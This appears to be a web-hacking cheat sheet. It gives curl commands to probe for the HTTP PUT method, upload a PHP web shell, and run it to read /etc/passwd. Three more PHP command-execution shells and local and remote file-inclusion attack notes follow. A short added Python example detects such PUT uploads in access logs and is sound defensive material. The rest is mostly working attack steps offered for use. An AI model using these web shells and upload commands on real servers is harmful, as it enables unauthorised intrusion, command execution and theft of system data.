PlayingWithWebsitesThatWorks
Check whether PUT is allowed (OPTIONS request) for a bunch of web links
curl -v -X OPTIONS $(cat /root/Desktop/bunchoflinks.txt)
Check whether PUT is allowed (OPTIONS request) for a web link
curl -v -X OPTIONS http://link/sublink
Inject backdoor on PUT
curl -v -X PUT -d '<?php system($_GET["cmd"]); ?>' http://link/sublink/backdoor.php
Calling the backdoor
http://link/sublink/backdoor.php?cmd=cat%20/etc/passwd
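Detection side of the PUT upload and backdoor call above, as an added example that is not part of the original gist: a successful PUT of a script file followed by a request to that same path is a pattern worth alerting on in web server access logs. It assumes Apache/nginx "combined" log format; the function name find_put_webshells and all sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in "combined" access-log format (not from a real server).
SAMPLE_LOG = """\
203.0.113.7 - - [10/Oct/2023:13:55:01 +0000] "OPTIONS /sublink HTTP/1.1" 200 0 "-" "curl/8.0"
203.0.113.7 - - [10/Oct/2023:13:55:09 +0000] "PUT /sublink/backdoor.php HTTP/1.1" 201 0 "-" "curl/8.0"
198.51.100.4 - - [10/Oct/2023:13:56:00 +0000] "GET /index.php?page=2 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Oct/2023:13:56:30 +0000] "GET /sublink/backdoor.php?cmd=cat%20/etc/passwd HTTP/1.1" 200 1843 "-" "curl/8.0"
198.51.100.9 - - [10/Oct/2023:13:57:00 +0000] "PUT /uploads/logo.png HTTP/1.1" 403 0 "-" "curl/8.0"
"""

# client ip, timestamp, method, request target, status code
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) ')
SCRIPT_EXT = (".php", ".phtml", ".php5", ".phar", ".jsp", ".asp", ".aspx")

def find_put_webshells(log_text):
    """Flag successful PUTs of script files and later requests to those paths."""
    uploaded = {}   # path -> (ip, timestamp) of the successful PUT
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        ip, ts, method, target, status = m.groups()
        url = urlsplit(target)
        if method == "PUT" and status.startswith("2") and url.path.lower().endswith(SCRIPT_EXT):
            uploaded[url.path] = (ip, ts)
            findings.append(("script-upload", ip, ts, url.path, None))
        elif url.path in uploaded and method in ("GET", "POST"):
            # Record parameter names only; values may contain sensitive output paths.
            params = sorted(parse_qs(url.query, keep_blank_values=True))
            findings.append(("uploaded-script-executed", ip, ts, url.path, params))
    return findings

if __name__ == "__main__":
    for finding in find_put_webshells(SAMPLE_LOG):
        print(finding)
```

Disabling PUT (or any write method) on directories where the server executes scripts removes the condition this check looks for.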
Get Server banner
curl -I -L http://link
Bypass Authentication via Token
Use CookiesManager+
Remote File Inclusion Shells
<?php
system($_GET['cmd']);
?>
<?php
passthru($_REQUEST['cmd']);
?>
<?php
echo exec($_POST['cmd']);
?>
Local File Inclusion
Use LFISuite - Proceed to attack based on what you find: auth.log, access.log, /proc/self/fd, /proc/self/environ, phar, filter, expect, input, data, or zip
Key for File Inclusion on PHPinfo
allow_url_fopen=on - LFI is possible
allow_url_include=off - RFI may not be possible
display_errors=off - errors are not displayed